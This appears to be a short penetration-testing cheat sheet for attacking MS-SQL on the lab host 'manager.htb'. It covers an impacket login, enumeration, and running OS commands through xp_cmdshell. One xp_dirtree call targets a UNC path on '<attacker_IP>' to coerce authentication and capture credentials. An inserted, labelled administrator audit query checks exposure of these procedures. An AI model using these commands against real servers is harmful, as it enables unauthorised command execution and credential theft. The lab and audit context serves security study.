ms-sql

Connect with impacket-mssqlclient.py:

mssqlclient.py manager.htb/operator:[email protected] -windows-auth

Show databases

SELECT name, database_id, create_date FROM sys.databases; 

Show tables

SELECT name FROM sys.tables;

Check if we have permission to run xp_*

EXEC sp_helprotect 'xp_cmdshell'
EXEC sp_helprotect 'xp_dirtree'
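
The same check from the administrator's side, as an added example that is not part of the original page: a T-SQL audit that reports whether xp_cmdshell is enabled and which principals hold permissions on xp_cmdshell and xp_dirtree. It uses only built-in catalog views, and the column aliases are chosen here for readability.

```sql
-- Added example (not from the original page): audit exposure of
-- xp_cmdshell / xp_dirtree on an instance you administer.
USE master;

-- 1. Is xp_cmdshell enabled? configured_value is what was set with
--    sp_configure; running_value is what the instance currently uses.
SELECT name,
       CAST(value        AS int) AS configured_value,
       CAST(value_in_use AS int) AS running_value
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'show advanced options');

-- 2. Explicit GRANT / DENY entries on the two extended procedures.
--    A row with grantee = 'public' means every login mapped into
--    master can call the procedure.
SELECT o.name             AS procedure_name,
       pr.name            AS grantee,
       pr.type_desc       AS grantee_type,
       pe.permission_name,
       pe.state_desc      AS permission_state
FROM sys.database_permissions AS pe
JOIN sys.all_objects          AS o
     ON o.object_id = pe.major_id
JOIN sys.database_principals  AS pr
     ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1                       -- object-level permissions
  AND o.name IN (N'xp_cmdshell', N'xp_dirtree')
ORDER BY o.name, pr.name;

-- 3. Members of sysadmin bypass permission checks entirely, so they
--    never appear in query 2 but can still run both procedures.
SELECT m.name       AS sysadmin_member,
       m.type_desc  AS member_type,
       m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r
     ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m
     ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY m.name;
```

Review any non-administrative grantee returned by query 2 and any unexpected account returned by query 3.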

Execute code

EXEC xp_cmdshell 'whoami';

List files

EXEC xp_dirtree '\\<attacker_IP>\any\thing'
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;